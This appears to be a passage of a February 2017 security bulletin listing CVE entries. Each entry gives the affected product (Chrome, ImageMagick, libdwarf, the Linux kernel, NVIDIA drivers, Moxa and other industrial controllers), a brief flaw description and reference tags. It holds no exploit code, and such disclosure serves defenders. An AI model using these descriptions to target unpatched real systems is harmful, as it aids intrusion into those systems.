facebook — hhvm Integer overflow in bcmath in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors, which triggers a buffer overflow. 2017-02-17 not yet calculated CVE-2016-6871
MLIST
MLIST
CONFIRM
facebook — hhvm The array_*_recursive functions in Facebook HHVM before 3.15.0 allow attackers to have unspecified impact via unknown vectors, related to recursion. 2017-02-17 not yet calculated CVE-2016-6874
MLIST
MLIST
CONFIRM
facebook — hhvm Infinite recursion in wddx in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors. 2017-02-17 not yet calculated CVE-2016-6875
MLIST
MLIST
CONFIRM
facebook — hhvm Out-of-bounds write in the (1) mb_detect_encoding, (2) mb_send_mail, and (3) mb_detect_order functions in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors. 2017-02-17 not yet calculated CVE-2016-6870
MLIST
MLIST
CONFIRM
facebook — hhvm Integer overflow in StringUtil::implode in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors. 2017-02-17 not yet calculated CVE-2016-6872
MLIST
MLIST
CONFIRM
fatek — winproladder An issue was discovered in Fatek Automation PLC WinProladder Version 3.11 Build 14701. A stack-based buffer overflow vulnerability exists when the software application connects to a malicious server, resulting in a stack buffer overflow. This causes an exploitable Structured Exception Handler (SEH) overwrite condition that may allow remote code execution. 2017-02-13 not yet calculated CVE-2016-8377
BID
MISC
fidelix — fidelix_fx-20 An issue was discovered in Fidelix FX-20 series controllers, versions prior to 11.50.19. Arbitrary file reading via path traversal allows an attacker to access arbitrary files and directories on the server. 2017-02-13 not yet calculated CVE-2016-9364
BID
MISC
fortinet — fortimanager An improper certificate validation vulnerability in Fortinet FortiManager 5.0.6 through 5.2.7 and 5.4.0 through 5.4.1 allows remote attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack via the Fortisandbox devices probing feature. 2017-02-13 not yet calculated CVE-2016-8495
CONFIRM
froxlor — froxlor Froxlor before 0.9.35 uses the PHP rand function for random number generation, which makes it easier for remote attackers to guess the password reset token by predicting a value. 2017-02-13 not yet calculated CVE-2016-5100
CONFIRM
ge — proficy_hmi/scada An issue was discovered in General Electric (GE) Proficy HMI/SCADA iFIX Version 5.8 SIM 13 and prior versions, Proficy HMI/SCADA CIMPLICITY Version 9.0 and prior versions, and Proficy Historian Version 6.0 and prior versions. An attacker may be able to retrieve user passwords if he or she has access to an authenticated session. 2017-02-13 not yet calculated CVE-2016-9360
BID
MISC
genixcms — genixcms SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS through 1.0.2 allows remote authenticated users to execute arbitrary SQL commands via the order parameter. 2017-02-17 not yet calculated CVE-2017-6065
MISC
google — chrome FFmpeg in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, failed to perform proper bounds checking, which allowed a remote attacker to potentially exploit heap corruption via a crafted video file. 2017-02-17 not yet calculated CVE-2017-5024
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, had an insufficiently strict content security policy on the Chrome app launcher page, which allowed a remote attacker to inject scripts or HTML into a privileged page via a crafted HTML page. 2017-02-17 not yet calculated CVE-2017-5018
BID
CONFIRM
CONFIRM
google — chrome Interactions with the OS in Google Chrome prior to 56.0.2924.76 for Mac insufficiently cleared video memory, which allowed a remote attacker to possibly extract image fragments on systems with GeForce 8600M graphics chips via a crafted HTML page. 2017-02-17 not yet calculated CVE-2017-5017
BID
CONFIRM
CONFIRM
google — chrome A use after free in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. 2017-02-17 not yet calculated CVE-2017-5021
BID
CONFIRM
CONFIRM
gosa — gosa The generate_smb_nt_hash function in include/functions.inc in GOsa allows remote attackers to execute arbitrary commands via a crafted password. 2017-02-13 not yet calculated CVE-2015-8771
MLIST
CONFIRM
graphicsmagick — graphicsmagick The AcquireMagickMemory function in MagickCore/memory.c in GraphicsMagick before 7.0.3.3 allows remote attackers to have unspecified impact via a crafted image, which triggers a memory allocation failure. 2017-02-15 not yet calculated CVE-2016-8862
DEBIAN
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
graphicsmagick — graphicsmagick The AcquireMagickMemory function in MagickCore/memory.c in GraphicsMagick 7.0.3.3 before 7.0.3.8 allows remote attackers to have unspecified impact via a crafted image, which triggers a memory allocation failure. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-8862. 2017-02-15 not yet calculated CVE-2016-8866
SUSE
SUSE
SUSE
MLIST
MLIST
MISC
CONFIRM
CONFIRM
hanwha_techwin — smart_security_manager
 
An issue was discovered in Hanwha Techwin Smart Security Manager Versions 1.5 and prior. Multiple Cross Site Request Forgery vulnerabilities have been identified. The flaws exist within the Redis and Apache Felix Gogo servers that are installed as part of this product. By issuing specific HTTP Post requests, an attacker can gain system level access to a remote shell session. Smart Security Manager Versions 1.5 and prior are affected by these vulnerabilities. These vulnerabilities can allow for remote code execution. 2017-02-13 not yet calculated CVE-2017-5169
MISC
hanwha_techwin — smart_security_manager
 
An issue was discovered in Hanwha Techwin Smart Security Manager Versions 1.5 and prior. Multiple Path Traversal vulnerabilities have been identified. The flaws exist within the ActiveMQ Broker service that is installed as part of the product. By issuing specific HTTP requests, if a user visits a malicious page, an attacker can gain access to arbitrary files on the server. Smart Security Manager Versions 1.4 and prior to 1.31 are affected by these vulnerabilities. These vulnerabilities can allow for remote code execution. 2017-02-13 not yet calculated CVE-2017-5168
MISC
hirschmann — geko_lite_managed_switch
 
An issue was discovered in Belden Hirschmann GECKO Lite Managed switch, Version 2.0.00 and prior versions. After an administrator downloads a configuration file, a copy of the configuration file, which includes hashes of user passwords, is saved to a location that is accessible without authentication by path traversal. 2017-02-13 not yet calculated CVE-2017-5163
BID
MISC
honeywell — experion_pks_platform
 
An issue was discovered in Honeywell Experion Process Knowledge System (PKS) platform: Experion PKS, Release 3xx and prior, Experion PKS, Release 400, Experion PKS, Release 410, Experion PKS, Release 430, and Experion PKS, Release 431. Experion PKS does not properly validate input. By sending a specially crafted packet, an attacker could cause the process to terminate. A successful exploit would prevent firmware uploads to the Series-C devices. 2017-02-13 not yet calculated CVE-2016-8344
BID
MISC
ibhsoftec — softplc
 
An issue was discovered in IBHsoftec S7-SoftPLC prior to 4.12b. Object memory can read a network packet that is larger than the space that is available (a heap-based buffer overflow). 2017-02-13 not yet calculated CVE-2016-8364
BID
MISC
ibm — resilient
 
IBM Resilient v26.0, v26.1, and v26.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference#: 213457065. 2017-02-16 not yet calculated CVE-2016-6062
BID
CONFIRM
ibm — security_access_manager
 
IBM Security Access Manager for Web 7.0.0, 8.0.0, and 9.0.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM Reference #: 1996868. 2017-02-16 not yet calculated CVE-2016-5919
CONFIRM
ibm — tivoli
 
IBM Tivoli Storage Manager for Virtual Environments 7.1 (VMware) is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM Reference #: 1995545. 2017-02-15 not yet calculated CVE-2016-6033
CONFIRM
BID
ibm — websphere
 
IBM Websphere MQ JMS 7.0.1, 7.1, 7.5, 8.0, and 9.0 client provides classes that deserialize objects from untrusted sources which could allow a malicious user to execute arbitrary Java code by adding vulnerable classes to the classpath. IBM Reference #: 1983457. 2017-02-15 not yet calculated CVE-2016-0360
CONFIRM
BID
icoutils — icoutils
 
An issue was discovered in icoutils 0.31.1. A buffer overflow was observed in the "decode_ne_resource_id" function in the "restable.c" source file. This is happening because the "len" parameter for memcpy is not checked for size and thus becomes a negative integer in the process, resulting in a failed memcpy. This affects wrestool. 2017-02-16 not yet calculated CVE-2017-6009
MISC
icoutils — icoutils
 
An issue was discovered in icoutils 0.31.1. A buffer overflow was observed in the "extract_icons" function in the "extract.c" source file. This issue can be triggered by processing a corrupted ico file and will result in an icotool crash. 2017-02-16 not yet calculated CVE-2017-6010
MISC
icoutils — icoutils
 
An issue was discovered in icoutils 0.31.1. An out-of-bounds read leading to a buffer overflow was observed in the "simple_vec" function in the "extract.c" source file. This affects icotool. 2017-02-16 not yet calculated CVE-2017-6011
MISC
ikiwiki — ikiwiki
 
ikiwiki 3.20161219 does not properly check if a revision changes the access permissions for a page on sites with the git and recentchanges plugins and the CGI interface enabled, which allows remote attackers to revert certain changes by leveraging permissions to change the page before the revision was made. 2017-02-13 not yet calculated CVE-2016-10026
CONFIRM
MLIST
MLIST
CONFIRM
imagemagick — imagemagick
 
Heap-based buffer overflow in the IsPixelGray function in MagickCore/pixel-accessor.h in ImageMagick 7.0.3.8 allows remote attackers to cause a denial of service (out-of-bounds heap read) via a crafted image file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-9556. 2017-02-16 not yet calculated CVE-2016-9773
MLIST
MLIST
MLIST
MISC
imagemagick — imagemagick
 
The IsPixelMonochrome function in MagickCore/pixel-accessor.h in ImageMagick 7.0.3.0 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted file. NOTE: the vendor says "This is a Q64 issue and we do not support Q64." 2017-02-15 not yet calculated CVE-2016-8678
MLIST
MLIST
BID
CONFIRM
MISC
imagemagick — imagemagick
 
The AcquireQuantumPixels function in MagickCore/quantum.c in ImageMagick before 7.0.3-1 allows remote attackers to have unspecified impact via a crafted image file, which triggers a memory allocation failure. 2017-02-15 not yet calculated CVE-2016-8677
SUSE
DEBIAN
MLIST
BID
MISC
CONFIRM
CONFIRM
CONFIRM
integraxor — ecava
 
An issue was discovered in Ecava IntegraXor Version 5.0.413.0. The Ecava IntegraXor web server has parameters that are vulnerable to SQL injection. If the queries are not sanitized, the host’s database could be subject to read, write, and delete commands. 2017-02-13 not yet calculated CVE-2016-8341
BID
MISC
interschalt — vdr
 
An issue was discovered in INTERSCHALT Maritime Systems VDR G4e Versions 5.220 and prior. External input is used to construct paths to files and directories without properly neutralizing special elements within the pathname that could allow an attacker to read files on the system, a Path Traversal. 2017-02-13 not yet calculated CVE-2016-9339
BID
MISC
kabona — webdatorcentral
 
An issue was discovered in Kabona AB WebDatorCentral (WDC) application prior to Version 3.4.0. WDC does not limit authentication attempts that may allow a brute force attack method. 2017-02-13 not yet calculated CVE-2016-8347
BID
MISC
libdwarf — libdwarf
 
The _dwarf_read_line_table_header function in dwarf_line_table_reader.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5035
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The print_exprloc_content function in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5033
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_calculate_info_section_end_ptr function in libdwarf before 20160923 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5030
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The WRITE_UNALIGNED function in dwarf_elf_access.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds write and crash) via a crafted DWARF section. 2017-02-17 not yet calculated CVE-2016-5044
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
dwarf_elf_access.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted file, related to relocation records. 2017-02-17 not yet calculated CVE-2016-5034
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The dwarf_get_xu_hash_entry function in libdwarf before 20160923 allows remote attackers to cause a denial of service (crash) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5032
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The print_frame_inst_bytes function in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5031
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_load_section function in libdwarf before 20160923 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted file. 2017-02-17 not yet calculated CVE-2016-5037
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The dump_block function in print_sections.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via crafted frame data. 2017-02-17 not yet calculated CVE-2016-5036
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The read_line_table_program function in dwarf_line_table_reader_common.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via crafted input. 2017-02-17 not yet calculated CVE-2016-7510
MISC
CONFIRM
libdwarf — libdwarf
 
The get_attr_value function in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted object with all-bits on. 2017-02-17 not yet calculated CVE-2016-5039
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The dwarf_get_macro_startend_file function in dwarf_macro5.c in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted string offset for .debug_str. 2017-02-17 not yet calculated CVE-2016-5038
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
Integer overflow in the dwarf_die_deliv.c in libdwarf 20160613 allows remote attackers to cause a denial of service (crash) via a crafted file. 2017-02-17 not yet calculated CVE-2016-7511
CONFIRM
CONFIRM
libdwarf — libdwarf
 
The create_fullest_file_path function in libdwarf before 20160923 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted dwarf file. 2017-02-17 not yet calculated CVE-2016-5029
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The dwarf_dealloc function in libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted DWARF section. 2017-02-17 not yet calculated CVE-2016-5043
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_get_size_of_val function in libdwarf/dwarf_util.c in Libdwarf before 20161124 allows remote attackers to cause a denial of service (out-of-bounds read) by calling the dwarfdump command on a crafted file. 2017-02-15 not yet calculated CVE-2016-8679
MLIST
BID
MISC
CONFIRM
libdwarf — libdwarf
 
The print_frame_inst_bytes function in libdwarf before 20160923 allows remote attackers to cause a denial of service (NULL pointer dereference) via an object file with empty bss-like sections. 2017-02-17 not yet calculated CVE-2016-5028
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_get_abbrev_for_code function in dwarf_util.c in libdwarf 20161001 and earlier allows remote attackers to cause a denial of service (out-of-bounds read) by calling the dwarfdump command on a crafted file. 2017-02-15 not yet calculated CVE-2016-8680
MLIST
BID
MISC
CONFIRM
CONFIRM
libdwarf — libdwarf
 
libdwarf before 20160923 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a large length value in a compilation unit header. 2017-02-17 not yet calculated CVE-2016-5040
MLIST
MLIST
CONFIRM
libdwarf — libdwarf
 
The _dwarf_get_abbrev_for_code function in dwarf_util.c in libdwarf 20161001 and earlier allows remote attackers to cause a denial of service (out-of-bounds read) by calling the dwarfdump command on a crafted file. 2017-02-15 not yet calculated CVE-2016-8681
MLIST
BID
MISC
CONFIRM
libdwarf — libdwarf
 
The dwarf_get_aranges_list function in libdwarf before 20160923 allows remote attackers to cause a denial of service (infinite loop and crash) via a crafted DWARF section. 2017-02-17 not yet calculated CVE-2016-5042
MLIST
MLIST
CONFIRM
CONFIRM
libjpeg — libjpeg
 
The cjpeg utility in libjpeg allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or execute arbitrary code via a crafted file. 2017-02-13 not yet calculated CVE-2016-3616
CONFIRM
CONFIRM
libtomcrypt — libtomcrypt
 
The rsa_verify_hash_ex function in rsa_verify_hash.c in LibTomCrypt, as used in OP-TEE before 2.2.0, does not validate that the message length is equal to the ASN.1 encoded data length, which makes it easier for remote attackers to forge RSA signatures or public certificates by leveraging a Bleichenbacher signature forgery attack. 2017-02-13 not yet calculated CVE-2016-6129
CONFIRM
CONFIRM
CONFIRM
linux — linux_kernel
 
The TCP stack in the Linux kernel 3.x does not properly implement a SYN cookie protection mechanism for the case of a fast network connection, which allows remote attackers to cause a denial of service (CPU consumption) by sending many TCP SYN packets, as demonstrated by an attack against the kernel-3.10.0 package in CentOS Linux 7. 2017-02-14 not yet calculated CVE-2017-5972
MISC
MISC
linux — linux_kernel
 
Race condition in kernel/events/core.c in the Linux kernel before 4.9.7 allows local users to gain privileges via a crafted application that makes concurrent perf_event_open system calls for moving a software group into a hardware context. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-6786. 2017-02-18 not yet calculated CVE-2017-6001
CONFIRM
CONFIRM
MLIST
CONFIRM
CONFIRM
linux — linux_kernel
 
Race condition in the sctp_wait_for_sndbuf function in net/sctp/socket.c in the Linux kernel before 4.9.11 allows local users to cause a denial of service (assertion failure and panic) via a multithreaded application that peels off an association in a certain buffer-full state. 2017-02-18 not yet calculated CVE-2017-5986
CONFIRM
CONFIRM
MLIST
CONFIRM
CONFIRM
linux — linux_kernel
 
The dccp_rcv_state_process function in net/dccp/input.c in the Linux kernel through 4.9.11 mishandles DCCP_PKT_REQUEST packet data structures in the LISTEN state, which allows local users to cause a denial of service (invalid free) or possibly have unspecified other impact via an application that makes an IPV6_RECVPKTINFO setsockopt system call. 2017-02-18 not yet calculated CVE-2017-6074
CONFIRM
locus_energy — l_gate
 
An issue was discovered in Locus Energy LGate prior to 1.05H, LGate 50, LGate 100, LGate 101, LGate 120, and LGate 320. Locus Energy meters use a PHP script to manage the energy meter parameters for voltage monitoring and network configuration. The PHP code does not properly validate information that is sent in the POST request. 2017-02-13 not yet calculated CVE-2016-5782
BID
BID
MISC
mantisbt — mantisbt
 
MantisBT before 1.3.1 and 2.x before 2.0.0-beta.2 uses a weak Content Security Policy when using the Gravatar plugin, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors. 2017-02-17 not yet calculated CVE-2016-7111
MLIST
MLIST
CONFIRM
CONFIRM
mantisbt — mantisbt
 
Cross-site scripting (XSS) vulnerability in manage_custom_field_edit_page.php in MantisBT 1.2.19 and earlier allows remote attackers to inject arbitrary web script or HTML via the return parameter. 2017-02-17 not yet calculated CVE-2016-5364
MLIST
CONFIRM
CONFIRM
CONFIRM
mcafee — intel_security_mcafee_agent
 
Unvalidated parameter vulnerability in the remote log viewing capability in Intel Security McAfee Agent 5.0.x versions prior to 5.0.4.449 allows remote attackers to pass unexpected input parameters via a URL that was not completely validated. 2017-02-13 not yet calculated CVE-2017-3896
BID
CONFIRM
mitsubishi — melsec-q
 
An issue was discovered in Mitsubishi Electric Automation MELSEC-Q series Ethernet interface modules QJ71E71-100, all versions, QJ71E71-B5, all versions, and QJ71E71-B2, all versions. The affected Ethernet interface module is connected to a MELSEC-Q PLC, which may allow a remote attacker to connect to the PLC via Port 5002/TCP and cause a denial of service, requiring the PLC to be reset to resume operation. This is caused by an Unrestricted Externally Accessible Lock. 2017-02-13 not yet calculated CVE-2016-8368
BID
MISC
mitsubishi — melsec-q
 
An issue was discovered in Mitsubishi Electric Automation MELSEC-Q series Ethernet interface modules QJ71E71-100, all versions, QJ71E71-B5, all versions, and QJ71E71-B2, all versions. Weakly encrypted passwords are transmitted to a MELSEC-Q PLC. 2017-02-13 not yet calculated CVE-2016-8370
BID
MISC
moxa — edr_810
 
An issue was discovered in Moxa EDR-810 Industrial Secure Router. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access configuration and log files (PRIVILEGE ESCALATION). 2017-02-13 not yet calculated CVE-2016-8346
BID
MISC
moxa — iologik
 
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. A password is transmitted in a format that is not sufficiently secure. 2017-02-13 not yet calculated CVE-2016-8372
BID
MISC
moxa — iologik
 
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. The web application fails to sanitize user input, which may allow an attacker to inject script or execute arbitrary code (CROSS-SITE SCRIPTING). 2017-02-13 not yet calculated CVE-2016-8359
BID
MISC
moxa — iologik
 
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. Users are restricted to using short passwords. 2017-02-13 not yet calculated CVE-2016-8379
BID
MISC
moxa — iologik
 
An issue was discovered in Moxa ioLogik E1210, firmware Version V2.4 and prior, ioLogik E1211, firmware Version V2.3 and prior, ioLogik E1212, firmware Version V2.4 and prior, ioLogik E1213, firmware Version V2.5 and prior, ioLogik E1214, firmware Version V2.4 and prior, ioLogik E1240, firmware Version V2.3 and prior, ioLogik E1241, firmware Version V2.4 and prior, ioLogik E1242, firmware Version V2.4 and prior, ioLogik E1260, firmware Version V2.4 and prior, ioLogik E1262, firmware Version V2.4 and prior, ioLogik E2210, firmware versions prior to V3.13, ioLogik E2212, firmware versions prior to V3.14, ioLogik E2214, firmware versions prior to V3.12, ioLogik E2240, firmware versions prior to V3.12, ioLogik E2242, firmware versions prior to V3.12, ioLogik E2260, firmware versions prior to V3.13, and ioLogik E2262, firmware versions prior to V3.12. The web application may not sufficiently verify whether a request was provided by a valid user (CROSS-SITE REQUEST FORGERY). 2017-02-13 not yet calculated CVE-2016-8350
BID
MISC
moxa — moxa
 
An issue was discovered in Moxa MiiNePort E1 versions prior to 1.8, E2 versions prior to 1.4, and E3 versions prior to 1.1. An attacker may be able to brute force an active session cookie to be able to download configuration files. 2017-02-13 not yet calculated CVE-2016-9344
BID
MISC
moxa — moxa
 
An issue was discovered in Moxa MiiNePort E1 versions prior to 1.8, E2 versions prior to 1.4, and E3 versions prior to 1.1. Configuration data are stored in a file that is not encrypted. 2017-02-13 not yet calculated CVE-2016-9346
BID
MISC
moxa — oncell
 
An issue was discovered in Moxa OnCell OnCellG3470A-LTE, AWK-1131A/3131A/4131A Series, AWK-3191 Series, AWK-5232/6232 Series, AWK-1121/1127 Series, WAC-1001 V2 Series, WAC-2004 Series, AWK-3121-M12-RTG Series, AWK-3131-M12-RCC Series, AWK-5232-M12-RCC Series, TAP-6226 Series, AWK-3121/4121 Series, AWK-3131/4131 Series, and AWK-5222/6222 Series. A user is able to execute arbitrary OS commands on the server. 2017-02-13 not yet calculated CVE-2016-8363
BID
MISC
moxa — oncell
 
An issue was discovered in Moxa OnCell OnCellG3470A-LTE, AWK-1131A/3131A/4131A Series, AWK-3191 Series, AWK-5232/6232 Series, AWK-1121/1127 Series, WAC-1001 V2 Series, WAC-2004 Series, AWK-3121-M12-RTG Series, AWK-3131-M12-RCC Series, AWK-5232-M12-RCC Series, TAP-6226 Series, AWK-3121/4121 Series, AWK-3131/4131 Series, and AWK-5222/6222 Series. Any user is able to download log files by accessing a specific URL. 2017-02-13 not yet calculated CVE-2016-8362
BID
MISC
navidia — navidia
 
All versions of NVIDIA GPU and GeForce Experience installer contain a vulnerability where it fails to set proper permissions on the package extraction path thus allowing a non-privileged user to tamper with the extracted files, potentially leading to escalation of privileges via code execution. 2017-02-15 not yet calculated CVE-2017-0317
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer handler where improper handling of values may cause a denial of service on the system. 2017-02-15 not yet calculated CVE-2017-0319
CONFIRM
navidia — navidia
 
NVIDIA GPU Display Driver R378 contains a vulnerability in the kernel mode layer handler where improper access control may lead to denial of service or possible escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0311
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape where untrusted input is used for buffer size calculation leading to denial of service or escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0308
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer handler where a NULL pointer dereference caused by invalid user input may lead to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0323
CONFIRM
navidia — navidia
 
All versions of NVIDIA GPU Display Driver contain a vulnerability in the kernel mode layer handler where a NULL pointer dereference caused by invalid user input may lead to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0321
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer handler where improper handling of values may cause a denial of service on the system. 2017-02-15 not yet calculated CVE-2017-0320
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscapeID 0x100008b where user-provided input is used as the limit for a loop, which may lead to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0312
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape where the size of an input buffer is not validated, leading to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0324
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler where a value passed from a user to the driver is not correctly validated and used as the index to an array, leading to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0322
CONFIRM
navidia — navidia
 
All versions of NVIDIA GPU Display Driver contain a vulnerability in the kernel mode layer handler where multiple integer overflows may cause improper memory allocation leading to a denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0309
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) implementation of the SubmitCommandVirtual DDI (DxgkDdiSubmitCommandVirtual) where untrusted input is used to reference memory outside of the intended boundary of the buffer leading to denial of service or escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0313
CONFIRM
navidia — navidia
 
All versions of NVIDIA GPU Display Driver contain a vulnerability in the kernel mode layer handler where improper access controls allow an unprivileged user to cause a denial of service. 2017-02-15 not yet calculated CVE-2017-0310
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape where an attempt to access an invalid object pointer may lead to denial of service or potential escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0315
CONFIRM
navidia — navidia
 
All versions of NVIDIA Windows GPU Display Driver contain a vulnerability in the kernel mode layer (nvlddmkm.sys) implementation of the SubmitCommandVirtual DDI (DxgkDdiSubmitCommandVirtual) where untrusted input is used to reference memory outside of the intended boundary of the buffer leading to denial of service or escalation of privileges. 2017-02-15 not yet calculated CVE-2017-0314
CONFIRM
navidia — navidia
 
All versions of NVIDIA Linux GPU Display Driver contain a vulnerability in the kernel mode layer handler where improper validation of an input parameter may cause a denial of service on the system. 2017-02-15 not yet calculated CVE-2017-0318
CONFIRM
offis — dicom_dcmtk
 
Stack-based buffer overflow in the parsePresentationContext function in storescp in DICOM dcmtk-3.6.0 and earlier allows remote attackers to cause a denial of service (segmentation fault) via a long string sent to TCP port 4242. 2017-02-15 not yet calculated CVE-2015-8979
MISC
DEBIAN
MLIST
BID
MISC
CONFIRM
openssh — sshd
 
sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided. 2017-02-13 not yet calculated CVE-2016-6210
FULLDISC
BID
CONFIRM
osisoft — pi_coresight
 
